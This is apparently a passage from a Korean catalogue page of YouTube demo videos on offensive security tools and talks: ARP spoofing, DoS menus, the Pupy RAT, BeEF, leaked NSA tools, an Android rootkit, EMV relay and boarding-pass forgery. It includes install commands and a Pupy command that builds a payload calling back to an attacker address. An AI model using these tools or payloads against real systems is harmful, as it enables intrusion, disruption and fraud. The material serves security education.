>  [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
>  [*] Done!
> $
> ```

{% embed url="<https://youtu.be/Qz3hvIZH8OE>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# OWASP VBScan 0.1.7 introduction

\[Youtube Data] Public Data - \[OWASP-VBScan]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : OWASP VBScan 0.1.7 introduction

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> VBScan 툴 에 대한 시현 영상입니다. 웹 서비스의 취약점을 점검 하는 툴입니다.

### Description :&#x20;

> OWASP VBScan (short for \[VB]ulletin Vulnerability \[Scan]ner) is an opensource project in perl programming language to detect VBulletin CMS vulnerabilities and analysis them .I

### Infomation :&#x20;

> ### usage :
>
> ```
> ./vbscan.pl <target>
> ./vbscan.pl http://target.com/vbulletin
> ```

{% embed url="<https://youtu.be/SirozqDYERA>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Kali Linux Tools - KickThemOut (Kick devices off your network by performing an ARP Spoof attack)

\[Youtube Data] Public Data - \[kali Linux - KickThemOut]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 :  Kali Linux Tools - KickThemOut (Kick devices off your network by performing an ARP Spoof attack)

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> KickThemOut 툴 에 대한 시연 영상입니다. ARP Spoof Attack 툴입니다.

### Description : &#x20;

> A tool to kick devices out of your network and enjoy all the bandwidth for yourself. It allows you to select specific or all devices and ARP spoofs them off your local area network.

### Infomation :&#x20;

> GitHub : <https://github.com/k4m4/kickthemout>

{% embed url="<https://youtu.be/vkRJkq3MoNA>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Kali Linux Tools - PENTMENU bash script for recon and DOS attacks

\[Youtube Data] Public Data - \[kali Linux - PENTMENU]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Kali Linux Tools - PENTMENU bash script for recon and DOS attacks &#x20;

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :  &#x20;

> PENTMENU 툴 에 대한 시현 영상입니다.DoS Attack 툴입니다.

### Description :&#x20;

> **A bash select menu for quick and easy network recon and DOS attacks**

### Infomation :&#x20;

> GitHub : <https://github.com/GinjaChris/pentmenu>

{% embed url="<https://youtu.be/5o3IFFR4wDM>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Kali Linux 2016.2 - Websploit FrameWork

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Kali Linux 2016.2 - Websploit FrameWork&#x20;

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :   &#x20;

> Websploit FrameWork 에 대한 시현 영상입니다. 다양한 WEB 분석 및 Exploit, Network, Wifi 관련 공격 툴입니다.

{% embed url="<https://youtu.be/iEeRge7nYeQ>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Kali Linux Tools - Miranda

\[Youtube Data] Public Data - \[Kali Linux - Miranda]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Kali Linux Tools - Miranda &#x20;

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :  &#x20;

> Miranda 툴 에 대한 시현 영상입니다. Universal Plug-N-Play 지원 장치의 정보를 획득하는 툴입니다.

### Description :&#x20;

> Miranda is a Python-based Universal Plug-N-Play client application designed to discover, query and interact with UPNP devices, particularly Internet Gateway Devices (aka, routers). It can be used to audit UPNP-enabled devices on a network for possible vulnerabilities

### Infomation :&#x20;

> GitHub : <https://github.com/0x90/miranda-upnp>

{% embed url="<https://youtu.be/_tSbhB4kLkY>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Kali Linux | Usage Pupy Remote Administrator Tool

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Kali Linux | Usage Pupy Remote Administrator Tool &#x20;

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :  &#x20;

> Pupy 툴 에 대한 시현 영상입니다. Windows, Linux, OSX, Android 장치의 RAT 생성 및 지원 툴입니다.

### Description :&#x20;

> Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in python. It features an all-in-memory execution guideline and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.

### Infomation :&#x20;

> GitHub : <https://github.com/n1nj4sec/pupy>
>
> Install note
>
> ```
> git clone https://github.com/n1nj4sec/pupy.git cd pupy git submodule init git submodule update             ## Long Time pip install -r requirements.txt
> ```
>
> Usage it:
>
> ```
> $ ./pupygen.py -f exe_x64 -o test.ext connect --host 192.168.0.20:4444 $ ./pupysh.py
> ```

{% embed url="<https://youtu.be/sXO0V7AZtwo>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# SearchSploit Guide | Finding Exploits | Kali Linux

\[Youtube Data] Public Data - \[Kali Linux - SearchSploit]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 :   SearchSploit Guide | Finding Exploits | Kali Linux

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> SearchSploit 툴에 대한 시연 영상입니다.    &#x20;

### Description : &#x20;

> The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of [exploits](https://www.exploit-db.com/), [shellcode](https://www.exploit-db.com/shellcodes) and [papers](https://www.exploit-db.com/papers) gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and Proof-of-Concepts rather than advisories, making it a valuable resource for those who need actionable data right away. You can learn more about the project [here (Top Right -> About Exploit-DB)](https://www.exploit-db.com/) and [here (History)](https://www.exploit-db.com/history).

### Infomation :&#x20;

> ### Install
>
> SearchSploit requires either "CoreUtils" or "utilities" (e.g. `bash`, `sed`, `grep`, `awk`, etc.) for the core features to work. The self updating function will require `git`, and for the Nmap XML option to work, will require `xmllint` (found in the `libxml2-utils` package in Debian-based systems).
>
> You can find a **more in-depth guide in the** [**SearchSploit manual**](https://www.exploit-db.com/searchsploit).
>
> **Kali Linux**
>
> Exploit-DB/SearchSploit is already packaged inside of Kali-Linux. A method of installation is:
>
> ```
> kali@kali:~$ sudo apt -y install exploitdb
> ```
>
> *NOTE: Optional is to install the additional packages:*
>
> ```
> kali@kali:~$ sudo apt -y install exploitdb-bin-sploits exploitdb-papers
> ```
>
> **Git**
>
> In short: clone the repository, add the binary into `$PATH`, and edit the config file to reflect the git path:
>
> ```
> $ sudo git clone https://github.com/offensive-security/exploitdb.git /opt/exploitdb
> $ sudo ln -sf /opt/exploitdb/searchsploit /usr/local/bin/searchsploit
> ```

{% embed url="<https://youtu.be/nx3Uz9zNrWQ>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# FuzzBunch & MSF ShadowBrokers

\[Youtube Data] Public Data - \[FuzzBunch & MSF ShadowBrokers]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : FuzzBunch & MSF ShadowBrokers &#x20;

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :  &#x20;

> FuzzBunch 툴 에 대한 시현 영상입니다.

### Description&#x20;

> The original NSA cyber security tools leaked by TheShadowBrokers with one commented line in fb.py disabling "ListeningPost" module which is missing.

### Infomation :&#x20;

> GitHub : <https://github.com/exploitx3/FUZZBUNCH>&#x20;
>
> GitHub : <https://github.com/misterch0c/shadowbroker>
>
> &#x20;-> The following files were deleted after this repository was reported because it contained "sensitive data"

{% embed url="<https://youtu.be/B8kkHAa_ntk>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Kali Linux - BeEF & Linode

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Kali Linux - BeEF & Linode&#x20;

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :  &#x20;

> BeEF 사용법에 대한 시연 영상입니다.    &#x20;

### Description :&#x20;

> You can hack ANYONE (Ethically of course) using BeEF! It’s super simple and there are so many different ways to use BeEF to hack! With BeEF you can educate your family and friends that their web browsers and mobile devices are never safe while having a little bit of fun with it and learning something new!! BeEF is the browser exploitation framework and can be used with other popular hacking tools like Metasploit.&#x20;
>
> How to install BeEF on Ubuntu and port forward: [https://ntck.co/34DOea6](https://www.youtube.com/redirect?event=video_description\&redir_token=QUFFLUhqazJlR0d2NjZERWFYRHFmTlBRNm9wdGdkZDdJQXxBQ3Jtc0tudnpBY0JQMkpYanhZTTFLbTlPYm90aWszQ0RvUXNPVHktSnVpR3N1THVQcy0xWjlwa2RjWnVXMHNvLXFJdlNoN0ZJVFpxWGlKRV9JSWlBYktwUE1SREZORDlMc1Y4NUtPdUw5Y3BMV1hyQXhCVU55WQ\&q=https%3A%2F%2Fntck.co%2F34DOea6)

{% embed url="<https://youtu.be/3ogyS4KOlXc>" %}
시연 영상   &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Hiding Behind Android Runtime (ART)

\[Youtube Data] Public Data - \[ART]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Hiding Behind Android Runtime (ART)

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> Android 루트 킷 연구에 대한 논의부터 시작하여 이러한 기술이 현대 Android 시스템에서 사용하기가 점점 어려워지고 있습니다.&#x20;
>
> ART 내부로 들어가서 루트킷 생성과 관련된 파일 형식과 메커니즘을 논의합니다. 우리가 관련된 메커니즘을 이해하고 나면, 루트 킷 (rootkit)을 만드는 방법, 즉 무엇을 변경해야하는지, 어디에서 찾을 지, 어떻게 바꾸는 지, 그리고 시스템에서 끈기를 얻는 방법 등에 대해 논의 할 것입니다.

### Description :&#x20;

> The introduction of the new Android Runtime (ART) brings several improvements in Android. But, as with any new technology, it also brings new ways to conduct or enhance malicious activities. In this presentation, we will detail one of those ways.
>
> Once an attacker or malware has gained access to the Android device, the next step is to find ways to hide itself and gain persistence, and this is usually achieved by installing a rootkit. The majority of these rootkits are kernel mode rootkits and the common way of achieving persistence is by modifying files in the system partition. However, recent advancements in Android security, such as verified boot, have made this increasingly difficult. This presentation will demonstrate how to go around this difficulty by taking the game out of kernel mode and out of the system partition. We will show you how to take advantage of the mechanisms of ART to create a user mode rootkit.
>
> We will start with a discussion of past Android rootkit research and how these techniques have become increasingly difficult to use in modern Android systems. Then we will go deep into ART internals where we will discuss the file formats and mechanisms relevant to rootkit creation. After we have understood the mechanisms involved, we will then discuss methods of crafting the rootkit i.e. what to change, where to find them, and how to change them, and techniques on gaining persistence on the system. We will also examine the limitations of this approach and possible future work in this area.
>
> The talk will conclude with a live demonstration of an ART rootkit.

{% embed url="<https://youtu.be/tSQxuxmzXCc>" %}
시연 영상      &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Hacking a Professional Drone

\[Youtube Data] Public Data - \[Drone Hack]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Hacking a Professional Drone

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> 드론 해킹 시현 영상입니다. 여기에서 보시면 기술에 대한 설명과 이를 통해 앞으로 발생 될 문제점을 같이 생각해 보실수 있을거라 생각 합니다.<br>
>
> 전문 무인 항공기는 이제 일일 중요한 작업을 수행하기 위해 다양한 산업 분야 (예 : 공공 사업 회사, 법 집행 기관, 응급 구조 기관, 정부 기관 및 대학)에 적극적으로 사용되고 있습니다. 이 브리핑에서 Nils Rodday는 전문 무인기의 취약성을 악용하는 라이브 해킹을 수행하고 시스템의 보안을 효과적으로 제어하여 통제권을 인수합니다. 그는 또한 이러한 타협을 개선하기위한 실제적인 수정 및 접근법을 조사합니다.<br>
>
> Youtube 내용 중에 13분 정도쯤을 보시면 취약한 내용을 보여줍니다.

### Description : &#x20;

> Professional drones are now actively used across various industries (for example utility companies, law enforcement and first responder organizations, government agencies and universities) to perform daily critical operations. In this Briefing, Nils Rodday performs a live hack which exploits vulnerabilities of the professional drone and effectively compromises the security of the system to take over control. He also examines practical fixes and approaches for remediating these compromises.

{% embed url="<https://youtu.be/JRVb-xE1zTI>" %}
시연 영상     &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Bypassing Browser Security Policies for Fun and Profit

\[Youtube Data] Public Data - \[Bypassing Browser Security Policies]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Bypassing Browser Security Policies for Fun and Profit

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 : &#x20;

> 안드로이드 모바일의 브라우저의 취약점을 해킹 하는 시현 입니다. 데스크탑에서는 다양한 보안 소프트웨어로 자산을 보호하지만 핸드폰에서는 보안 소프트웨어가 거의 없기 때문에 영상에서 보시는 취약점이 존재 합니다.
>
> 데스크톱 브라우저에 비해 모바일 브라우저는 비교적 새롭고 동일한 수준의 조사를받지 못했습니다. 브라우저 공급 업체는 메모리 손상 공격에 대한 수많은 보호 메커니즘을 도입 및 구현하여 모든 상황에서 작동 할 수있는 신뢰할 수있는 공격 방법을 작성하는 것을 매우 어렵게 만듭니다. 이로 인해 클라이언트 측 공격의 "다른"범주가 남습니다. 이 프리젠 테이션에서는 "동일 출처 정책"및 "콘텐츠 보안 정책"과 같은 브라우저 내부에서 구현되는 핵심 보안 정책을 우회하는 방법에 대한 연구를 제시합니다.<br>
>
> 우리는 우리의 연구 중에 다양한 모바일 브라우저에서 발견 된 몇 가지 바이 패스를 제시 할 것입니다. 또한 안드로이드 브라우저에서 발견되는 바와 같이 주소 바 스푸핑, 콘텐츠 스푸핑, 크로스 오리진 CSS 공격, 캐릭터 세트 상속, CSP 바이 패스, 혼합 콘텐츠 바이 패스 등과 같은 다른 흥미로운 보안 결함을 발견 할 것입니다. 우리는 또한 여러 안드로이드 제로 데이를 밝히기 위해 사용한 테스트 방법론에 대해서도 이야기 할 것입니다.<br>
>
> 이론 외에도 우리 프리젠 테이션은 가장 인기있는 Android 타사 웹 브라우저 및 Android WebView에서 확인한 보안 취약점 및 약점의 가장 흥미로운 사례를 12 가지 공개합니다.
>
> 우리는 버그의 근본 원인을 설명하고 악용 사례를 보여주고, 취약한 코드의 예와 가능한 경우이 취약점을 해결하기 위해 발급 된 패치를 보여줍니다. 마지막으로 모든 모바일 웹 / 브라우저의 기본 보안 속성을 평가하는 데 사용할 수있는 샘플 테스트 스위트를 보여줍니다.

### Description :&#x20;

> Mobile browsers in comparison to desktop browsers are relatively new and have not gone under same level of scrutiny. Browser vendors have introduced and implemented tons of protection mechanisms against memory corruption exploits, which makes it very difficult to write a reliable exploit that would work under all circumstances. This leaves us with the "other" category of Client Side attacks. In this presentation, we will present our research about bypassing core security policies implemented inside browsers such as the "Same Origin Policy," and "Content Security Policy," etc.
>
> We will present several bypasses that were found in various mobile browsers during our research. In addition, we will also uncover other interesting security flaws found during our research such as Address Bar Spoofing, Content Spoofing, Cross Origin CSS Attacks, Charset Inheritance, CSP Bypass, Mixed Content Bypass, etc., as found in Android Browsers. We will also talk about the testing methodology that we used to uncover several android zero days.
>
> Apart from the theory, our presentation will also disclose a dozen of the most interesting examples of security vulnerabilities and weaknesses highlighted above, which we identified in the most popular Android third-party web browsers, and in Android WebView itself.
>
> We will explain the root cause of the bug and demonstrate their exploitation, show examples of vulnerable code and, where possible, patches that were issued to address these vulnerabilities. Finally, we will demonstrate a sample test suite which can be used to assess basic security properties of any mobile web/browser.

{% embed url="<https://youtu.be/P5R4KeCzO-Q>" %}
시연 영상      &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Relaying EMV Contactless Transactions Using Off-The-Self Android Devices

\[Youtube Data] Public Data - \[EMV Hack]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Relaying EMV Contactless Transactions Using Off-The-Self Android Devices

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 :&#x20;

> 우리는 레거시 모드를 사용하지 않고 사실상 모든 EMV 비접촉식 카드 및 터미널에 적용 할 수있는 EMV (Europay, MasterCard 및 Visa) Contactless의 첫 번째 취약점을 비접촉식으로 제시합니다. 특히, 매우 제한된 리소스와 널리 사용 가능한 상용 하드웨어로 릴레이 공격을 수행 할 수 있음을 보여줍니다. 우리의 PoC (proof-of-concept) 릴레이 공격은 범죄자가 피해자의 지갑 내부에있는 카드를 사용하여 POS 단말기에서 지불 할 수있는 반면, 피해자는 터미널에서 멀리 떨어져 있습니다. EMV 및 Android 전용 최적화를 사용하여 동일한 카드로 직접 수행 된 거래보다 특정 카드에 대해 더 빠른 세계 최초의 중계 트랜잭션을 보여줍니다. 따라서 가장 확실한 대책 인 타이밍 제한은 전혀 효과가 없을 것입니다.
>
> 또한 특정 발급 사의 카드 및 네덜란드에서 가장 많이 사용되는 POS 단말기의 취약점을 확인했습니다. 예를 들어, 특정 Maestro 카드에는 카드의 배포 프로세스와 관련된 취약점이 있습니다. 또한 특정 Visa 카드는 고유하지 않은 비밀 키를 사용하여 EMV 보안 요구 사항을 위반합니다. 네덜란드에서 가장 많이 사용되는 POS 단말기의 유형은 서비스 거부 (Denial-of-Service) 공격에 취약합니다.이 공격은 아마 버퍼 오버 플로우의 결과입니다.
>
> 우리의 연구 결과는 대중이 비접촉 거래를 수용하는 데 중요한 의미를 갖는다. 실제로 비접촉식 거래는 고객이 비접촉식 카드의 보안에 대해 확신하지 못하면 널리 받아 들여지지 않으며 은행은 상당한 평판 손상을 입을 수 있습니다.
>
> Youtube 내용 중에 9분 15초 정도쯤을 보시면 취약한 내용을 보여줍니다.

### Description :&#x20;

> We present the first vulnerabilities in EMV (Europay, MasterCard and Visa) Contactless that do not use legacy modes and that are applicable to practically all EMV Contactless cards and terminals. In particular, we show that a relay attack can be performed with very limited resources and widely available off-the-shelf hardware. Our proof-of-concept relay attack proves that a criminal can pay at a Point-of-Sale terminal, using the card inside a wallet of a victim, while the victim is arbitrary far away from the terminal. Using EMV and Android specific optimizations, we show the world's first relayed transaction that is faster for certain cards than a transaction performed directly with the same card. Therefore, the most obvious countermeasure, timing restriction, will likely not be effective at all.
>
> Furthermore, we identified other vulnerabilities in cards from certain issuers, and in the most used type of Point-of-Sale terminals in the Netherlands. For instance, certain Maestro cards have a vulnerability that concerns the distribution process of the cards. Furthermore, certain Visa cards break the EMV security requirements by using secret keys that are not unique. The most used type of Point-of-Sale terminals in the Netherlands is vulnerable to a Denial-of-Service attack, which presumably is the result of a buffer overflow.
>
> Our findings have significant implications for the acceptance of contactless transactions by the public. Indeed, contactless transactions will not be widely accepted by customers if they are not confident about the security of contactless cards, and banks can suffer significant reputational damage.

{% embed url="<https://youtu.be/oW1BNsYTQTk>" %}
시연 영상       &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# DEF CON 24 - Hacking boarding passes for fun and profit

\[Youtube Data] Public Data - \[DEF CON 24]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : DEF CON 24 - Hacking boarding passes for fun and profit

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### Description :&#x20;

> While traveling through airports, we usually don't give a second thought about why our boarding passes are scanned at various places. After all, it's all for the sake of passengers' security. Or is it? The fact that boarding pass security is broken has been proven many times by researchers who easily crafted their passes, effectively bypassing not just ‘passenger only’ screening, but also no-fly lists. Since then, not only security problems have not been solved, but boarding passes have become almost entirely bar-coded. And they are increasingly often checked by machines rather than humans. Effectively, we're dealing with simple unencrypted strings of characters containing all the information needed to decide on our eligibility for fast lane access, duty-free shopping, and more...
>
> With a set of easily available tools, boarding pass hacking is easier than ever, and the checks are mostly a security theater. In my talk, I will discuss in depth how the boarding pass information is created, encoded and validated. I will demonstrate how easy it is to craft own boarding pass that works perfectly at most checkpoints (and explain why it doesn't work at other ones).
>
> I will also discuss IATA recommendations, security measures implemented in boarding passes (such as digital signatures) and their (in)effectiveness, as well as responses I got from different institutions involved in handling boarding passes. There will be some fun, as well as some serious questions that I don't necessarily have good answers to.
>
> Przemek Jaroszewski is a member of CERT Polska (part of Research and Academic Computer Network in Poland) since 2001, where his current position is the head of incident response. He started his education as a programmer at Warsaw University of Technology, to eventually get his master's degree in Social Psychology from University of Social Sciences and Humanities in Warsaw. A frequent flyer in both professional and private lives, and a big aviation enthusiast - using every opportunity to learn about everything from inner workings of airports, airlines, ATC etc. to life-hacking of loyalty programs.

{% embed url="<https://youtu.be/CHPdxyJ_ooQ>" %}
시연 영상    &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# DEF CON 24 Internet of Things Village - Elvis Collado - Reversing and Exploiting Embedded Devices

\[Youtube Data] Public Data - \[Embedded Devices]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : DEF CON 24 Internet of Things Village - Elvis Collado - Reversing and Exploiting Embedded Devices

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 : &#x20;

> Embedded Devices 해킹 시현 영상입니다. IoT 의 전반적인 해킹 기술이 담겨 있으며 참고해서 보시기 바랍니다.

### Description :&#x20;

> This talk will go over the following: How all of this research got started, the critical vulnerabilities I personally discovered in modern devices, the challenges and failures I personally had with techniques like blind fuzzing, the challenges I had with not having the knowledge or funds to get into hardware hacking, figuring out how to build an exploit for a vulnerability without the need of using UART or a remote debugger, how to get started into hardware hacking once you've exhausted all means on the software side of things, how to build an effective but cheap IoT hacking lab, how to create your own low-cost 'JTAGulator' with an Arduino nano, how to cross compile and disassemble to quickly figure out CPU architectures that a person may be unfamiliar with, discussion of the open source project "Damn Vulnerable Router Firmware", and how to put this all together quickly so everyone can start finding vulnerabilities in the products they own. Also, the talk has been recently updated with comparisons of crafting exploits on x86 vs MIPS vs ARM. Before I only had x86 vs MIPS.
>
